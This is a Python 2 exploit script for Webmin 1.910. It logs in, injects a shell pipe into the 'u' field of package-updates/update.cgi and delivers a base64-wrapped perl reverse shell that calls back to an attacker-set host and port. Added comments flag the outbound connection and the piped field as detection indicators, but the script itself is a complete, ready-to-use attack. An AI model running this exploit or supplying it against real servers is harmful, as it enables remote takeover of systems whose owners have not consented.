This is a simple exploit for version 1.910 of the Webmin service that leads to remote code execution.
#!/usr/bin/python | |
from requests import post | |
from urllib import quote | |
from base64 import b64encode | |
from requests.packages.urllib3 import disable_warnings | |
from urllib3.exceptions import InsecureRequestWarning | |
# Target credentials and addresses. All six values are literal placeholders
# and must be edited before the script does anything meaningful.
USER = 'USER'
PASS = 'PASSWORD'
RHOST = 'REMOTE_IP'    # Webmin host, consumed by base_url()
RPORT = 'REMOTE_PORT'  # Webmin port, consumed by base_url()
LHOST = 'YOUR_IP'      # address the perl command below connects out to (PeerAddr)
LPORT = 'YOUR_PORT'    # port for that outbound connection
SSL = True             # True -> base_url() uses https, otherwise http
# Command carried by the injected request: a forked perl process opens an
# IO::Socket::INET connection to LHOST:LPORT and passes each received line to
# system(). From a defender's view the outbound connection from the Webmin
# host to LHOST:LPORT is the network indicator of this payload.
# Doubled braces are str.format() escapes; the trailing ';' is a harmless stray.
PAYLOAD = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){{if($ENV{{$key}}=~/(.*)/){{$ENV{{$key}}=$1;}}}}$c=new IO::Socket::INET(PeerAddr,\"{}:{}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){{if($_=~ /(.*)/){{system $1;}}}};'".format(LHOST, LPORT);
# The form that actually appears in the POST body built by deliver_payload():
# PAYLOAD base64-encoded, then decoded and fed to an interactive bash.
# b64encode() on a str only works under Python 2 (Python 3 requires bytes),
# consistent with the print statements used elsewhere in this file.
PAYLOAD_ENCODED = ('bash -c "{echo,' + b64encode(PAYLOAD) + '}|{base64,-d}|{bash,-i}"')
def base_url():
    """Return the target's root URL, e.g. 'https://REMOTE_IP:REMOTE_PORT/'.

    The scheme is picked by the module-level SSL flag; host and port come
    from RHOST and RPORT. The result always ends with a trailing slash.
    """
    scheme = 'https' if SSL else 'http'
    return '%s://%s:%s/' % (scheme, RHOST, RPORT)
def login():
    """Authenticate against session_login.cgi and return the 'sid' session cookie.

    Credentials come from the module-level USER/PASS and the target from
    base_url(). TLS certificate verification is disabled (verify=False) and
    redirects are not followed. If the response carries no 'sid' cookie the
    lookup on the cookie jar raises (KeyError).
    """
    credentials = {'user': USER, 'pass': PASS}
    # Cookies pre-seeded on the login request; 'sid' is only a placeholder
    # here, the real value is read from the response below.
    preset_cookies = {'testing': '1', 'redirect': '1', 'sid': 'x'}
    reply = post(
        base_url() + 'session_login.cgi',
        data=credentials,
        cookies=preset_cookies,
        verify=False,
        allow_redirects=False,
    )
    return reply.cookies['sid']
def deliver_payload(sid):
    """Send the command-injection request to package-updates/update.cgi.

    sid: session id cookie obtained from login().
    Returns None; the HTTP response is discarded.
    """
    # The 'u' form field (first value 'acl/apt', presumably a package selector)
    # is repeated with a value that starts with a shell pipe followed by
    # PAYLOAD_ENCODED. A 'u' value containing '|' in a request to update.cgi
    # is the indicator to look for when reviewing Webmin traffic or logs.
    data = "u=acl/apt&u= | {}&ok_top=Update+Selected+Packages".format(PAYLOAD_ENCODED)
    cookies = {'sid':sid}
    # Referer points at the package-updates page of the same target —
    # presumably to satisfy a server-side referer check; not verified here.
    headers = {'content-type': 'application/x-www-form-urlencoded', 'Referer':'{}/package-updates/?xnavigation=1'.format(base_url())}
    try:
        # verify=False: certificate validation is disabled for this request too.
        response = post(base_url() + 'package-updates/update.cgi', cookies=cookies, headers=headers, data=data, verify=False, allow_redirects=False)
    except KeyboardInterrupt:
        # NOTE(review): only Ctrl-C is caught, and `response` is never
        # inspected, so the caller gets no indication of whether the request
        # was delivered or what the server answered.
        pass
def banner():
    """Print the ASCII-art banner and author credit to stdout, one row per line."""
    rows = [
        " __ __ _ _ __ ___ __ ___ ",
        " \ \ / / | | (_) /_ | / _ \/_ | / _ \ ",
        " \ \ /\ / /___ | |__ _ __ ___ _ _ __ ______ | | | (_) || || | | |",
        " \ \/ \/ // _ \| '_ \ | '_ \`_ \ | || '_ \|______|| | \__, || || | | |",
        " \ /\ /| __/| |_) || | | | | || || | | | | | _ / / | || |_| |",
        " \/ \/ \___||_.__/ |_| |_| |_||_||_| |_| |_|(_)/_/ |_| \___/ ",
        " ",
        " -> coded by AzraelSec (federicogerardi94[at]gmail.com) \n",
    ]
    # Python 2 print statement, as used throughout this file.
    for row in rows:
        print row
if __name__ == '__main__':
    # Script entry point: print banner, log in, send the injected request.
    banner()
    # Python 2 print statements throughout; this file will not run as-is under Python 3.
    print 'Connecting to {}'.format(base_url())
    # Silences urllib3's InsecureRequestWarning for the verify=False requests
    # made in login() and deliver_payload(); it does not change what is sent.
    disable_warnings(category=InsecureRequestWarning)
    session_cookie = login()
    print 'Cookies forged: {}'.format(session_cookie)
    print 'Attacking using this payload: {}'.format(PAYLOAD)
    deliver_payload(session_cookie)
    # Printed unconditionally: deliver_payload() returns nothing and discards
    # the response, so this line is not an indicator that anything succeeded.
    print 'Attack completed :)'